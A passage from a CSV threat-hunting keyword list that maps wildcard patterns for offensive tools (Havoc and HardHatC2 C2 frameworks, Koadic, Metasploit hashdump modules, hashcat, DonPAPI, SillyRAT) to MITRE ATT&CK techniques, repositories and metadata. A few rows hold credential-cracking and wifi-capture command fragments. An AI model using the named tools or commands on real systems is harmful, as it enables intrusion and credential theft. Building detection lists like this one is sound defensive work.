T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Hangingsword/HouQing,1,1,N/A,10,10,205,59,2021-01-14T08:38:12Z,2021-01-14T07:13:21Z -*HardHatC2*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*hardhatc2.com*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*HardHatC2Client*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*HarmJ0y/DAMP*,offensive_tool_keyword,DAMP,The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.,T1222 - T1222.002 - T1548 - T1548.002,TA0005 ,N/A,N/A,Persistence,https://github.com/HarmJ0y/DAMP,1,1,N/A,10,4,356,78,2019-07-25T21:18:37Z,2018-04-06T22:13:58Z -*harvestcrop.exe * *,offensive_tool_keyword,Farmer,Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.,T1557.001 - T1056.004 - T1078.003,TA0006 - TA0004 - TA0001,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/mdsecactivebreach/Farmer,1,0,N/A,10,4,308,49,2021-04-28T15:27:24Z,2021-02-22T14:32:29Z -*HasAutoAdminLogonCredentials*,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/lkarlslund/Adalanche,1,0,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z -*hash3liZer/SillyRAT*,offensive_tool_keyword,SillyRAT,A Cross Platform multifunctional (Windows/Linux/Mac) RAT.,T1055.003 - T1027 - T1105 - T1005,TA0002 - TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/hash3liZer/SillyRAT,1,1,N/A,N/A,6,594,151,2023-06-23T18:49:43Z,2020-05-10T17:37:37Z -*hash3liZer/wifijammer*,offensive_tool_keyword,wifijammer,wifijammer,T1497 - T1498 - T1499,TA0040,N/A,N/A,Sniffing & Spoofing,https://github.com/hash3liZer/wifijammer,1,1,N/A,N/A,2,168,43,2021-06-10T12:33:49Z,2018-01-20T16:26:45Z -*Hash-Buster*,offensive_tool_keyword,Hash-Buster,hash cracking tool ,T1201 - T1110 - T1021,TA0001 - TA0002 - TA0006,N/A,N/A,POST Exploitation tools,https://github.com/s0md3v/Hash-Buster,1,1,N/A,N/A,10,1543,392,2023-04-11T09:43:06Z,2017-07-03T17:28:51Z -*hashcat*,offensive_tool_keyword,hashcat,Worlds fastest and most advanced password recovery utility.,T1110.001 - T1003.001 - T1021.001,TA0006 - TA0009 - TA0010,N/A,N/A,Credential Access,https://github.com/hashcat/hashcat,1,0,N/A,10,10,18342,2659,2023-10-03T07:17:40Z,2015-12-04T14:46:51Z -*hashcat-*.7z*,offensive_tool_keyword,hashcat,Worlds fastest and most advanced password recovery utility.,T1110.001 - T1003.001 - T1021.001,TA0006 - TA0009 - TA0010,N/A,N/A,Credential Access,https://github.com/hashcat/hashcat,1,1,N/A,10,10,18342,2659,2023-10-03T07:17:40Z,2015-12-04T14:46:51Z -*hashcat.git*,offensive_tool_keyword,hashcat,Worlds fastest and most advanced password recovery utility.,T1110.001 - T1003.001 - T1021.001,TA0006 - TA0009 - TA0010,N/A,N/A,Credential Access,https://github.com/hashcat/hashcat,1,1,N/A,10,10,18342,2659,2023-10-03T07:17:40Z,2015-12-04T14:46:51Z -*hashcat/hashcat*,offensive_tool_keyword,hashcat,Worlds fastest and most advanced password recovery utility.,T1110.001 - T1003.001 - T1021.001,TA0006 - TA0009 - TA0010,N/A,N/A,Credential Access,https://github.com/hashcat/hashcat,1,1,N/A,10,10,18342,2659,2023-10-03T07:17:40Z,2015-12-04T14:46:51Z -*hashdump.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,0,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*hashdump.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*hashdump_sam*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*HashDumpDCImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*HashDumpSAMImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*hasherezade/exe_to_dll*,offensive_tool_keyword,exe_to_dll,Converts a EXE into DLL,T1027.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/hasherezade/exe_to_dll,1,1,N/A,5,10,1095,177,2023-07-26T11:41:27Z,2020-04-16T16:27:00Z -*hasherezade/exe_to_dll*,offensive_tool_keyword,exe_to_dll,Converts an EXE so that it can be loaded like a DLL.,T1055.002 - T1073.001 - T1027,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/hasherezade/exe_to_dll,1,1,N/A,8,10,1095,177,2023-07-26T11:41:27Z,2020-04-16T16:27:00Z -*-hashes* --escalate-user*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dirkjanm/krbrelayx,1,0,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -*hashonymize --ntds * --kerberoast *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*HashPals/Name-That-Hash*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*--hash-type 1000 --potfile-path*.ntds.cracked*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*hashview*@*localhost*,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/hashview/hashview,1,1,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z -*hashview/config.conf*,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/hashview/hashview,1,1,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z -*hashview/hashview*,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/hashview/hashview,1,1,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z -*hashview-agent.*.tgz*,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/hashview/hashview,1,1,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z -*hashview-agent.py*,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/hashview/hashview,1,1,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z -*HasSPNNoPreauth*,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/lkarlslund/Adalanche,1,0,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z -*hatlord/snmpwn*,offensive_tool_keyword,snmpwn,SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do,T1210 - T1212 - T1558,TA0001 - TA0002,N/A,N/A,Exploitation tools,https://github.com/hatlord/snmpwn,1,1,N/A,N/A,3,222,50,2020-08-23T10:41:38Z,2016-06-16T10:31:13Z -*havoc client*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,0,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*havoc server*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*havoc.agent*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*Havoc.git*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*Havoc.hpp*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*havoc.service*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*havoc.yaotl*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*Havoc/Client*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*Havoc/cmd/*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*Havoc/payloads*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*Havoc/pkg*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*Havoc/Teamserver*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*havoc_agent.py*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*havoc_agent_talon.*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*havoc_default.yaotl*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*havoc_externalc2*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*havoc_service_connect*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*havoc-c2-client*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*havoc-c2-data*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*havocframework.com*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*HavocService*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*HavocTalonInteract*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*HavocUi.cpp*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*HavocUi.h*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*HavocUI.hpp*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*hccapx2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*hci_oracle_passwords*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*hcxdumptool -i wlan1 -o * --active_beacon --enable_status=1*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*hcxdumptool*,offensive_tool_keyword,hcxdumptool,Small tool to capture packets from wlan devices. After capturing. upload the uncleaned pcapng here (https://wpa-sec.stanev.org/?submit) to see if your ACCESS POINT or the CLIENT is vulnerable by using common wordlists. Convert the pcapng file to WPA-PBKDF2-PMKID+EAPOL hashline (22000) with hcxpcapngtool (hcxtools) and check if PreSharedKey or PlainMasterKey was transmitted unencrypted,T1040 - T1560 - T1539,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://github.com/ZerBea/hcxdumptool,1,1,N/A,N/A,10,1553,374,2023-10-02T15:51:15Z,2018-02-25T08:18:40Z -*hcxhashtool -i *.hashcat --info stdout*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*hcxpcapngtool --all -o *.hashcat*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*hcxpcapngtool -o *.hashcat *.pcapng*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*hd-launch-cmd *,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,0,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z -*headers/exploit.h*,offensive_tool_keyword,cobaltstrike,A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - 